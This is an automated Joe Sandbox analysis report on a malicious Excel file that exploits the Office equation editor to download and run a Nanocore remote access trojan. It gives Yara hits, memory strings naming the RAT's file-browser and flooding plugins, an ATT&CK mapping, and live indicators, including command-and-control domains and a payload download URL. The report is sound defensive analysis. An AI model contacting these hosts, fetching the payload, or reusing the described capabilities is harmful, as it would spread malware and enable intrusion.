          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Detected Nanocore RatShow sources
          Source: vbc.exe, 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
          Source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
          Source: RegAsm.exe, 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
          Source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Extra Window Memory Injection1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information31Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol122Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 431726 Sample: Ref 0180066743.xlsx Startdate: 09/06/2021 Architecture: WINDOWS Score: 100 36 wekeepworking12.sytes.net 2->36 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 18 other signatures 2->58 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 38 33 2->13         started        signatures3 process4 dnsIp5 42 198.12.127.155, 49167, 80 AS-COLOCROSSINGUS United States 8->42 26 C:\Users\user\AppData\Local\...\new[1].exe, PE32 8->26 dropped 28 C:\Users\Public\vbc.exe, PE32 8->28 dropped 62 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->62 15 vbc.exe 1 2 8->15         started        30 C:\Users\user\Desktop\~$Ref 0180066743.xlsx, data 13->30 dropped file6 signatures7 process8 file9 32 C:\Users\user\AppData\Roaming\win33.exe, PE32 15->32 dropped 34 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 15->34 dropped 44 Multi AV Scanner detection for dropped file 15->44 46 Creates an undocumented autostart registry key 15->46 48 Machine Learning detection for dropped file 15->48 50 3 other signatures 15->50 19 RegAsm.exe 4 15->19         started        signatures10 process11 dnsIp12 38 wekeepworking.sytes.net 79.134.225.90, 1144, 49168, 49169 FINK-TELECOM-SERVICESCH Switzerland 19->38 40 wekeepworking12.sytes.net 19->40 24 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 19->24 dropped 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->60 file13 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Ref 0180066743.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\win33.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe39%VirustotalBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe30%ReversingLabsByteCode-MSIL.Trojan.Bulz
          C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs
          C:\Users\user\AppData\Roaming\win33.exe30%ReversingLabsByteCode-MSIL.Trojan.Bulz
          C:\Users\Public\vbc.exe30%ReversingLabsByteCode-MSIL.Trojan.Bulz

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.RegAsm.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
          5.0.RegAsm.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          5.0.RegAsm.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          5.2.RegAsm.exe.de0000.14.unpack100%AviraTR/NanoCore.fadteDownload File

          Domains

          SourceDetectionScannerLabelLink
          wekeepworking.sytes.net8%VirustotalBrowse
          wekeepworking12.sytes.net2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          wekeepworking.sytes.net8%VirustotalBrowse
          wekeepworking.sytes.net0%Avira URL Cloudsafe
          http://198.12.127.155/new.exe0%Avira URL Cloudsafe
          wekeepworking12.sytes.net2%VirustotalBrowse
          wekeepworking12.sytes.net0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          wekeepworking.sytes.net
          79.134.225.90
          truetrueunknown
          wekeepworking12.sytes.net
          unknown
          unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          wekeepworking.sytes.nettrue
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://198.12.127.155/new.exetrue
          • Avira URL Cloud: safe
          unknown
          wekeepworking12.sytes.nettrue
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.%s.comPARegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpfalse
            high
            http://www.day.com/dam/1.0FFD606D5.emf.0.drfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              79.134.225.90
              wekeepworking.sytes.netSwitzerland
              6775FINK-TELECOM-SERVICESCHtrue
              198.12.127.155
              unknownUnited States
              36352AS-COLOCROSSINGUStrue

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:431726
              Start date:09.06.2021
              Start time:08:03:35
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 17s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Ref 0180066743.xlsx
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winXLSX@6/20@41/2
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 3.3% (good quality ratio 2.6%)
              • Quality average: 51.8%
              • Quality standard deviation: 33.9%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 77
              • Number of non-executed functions: 9
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsx
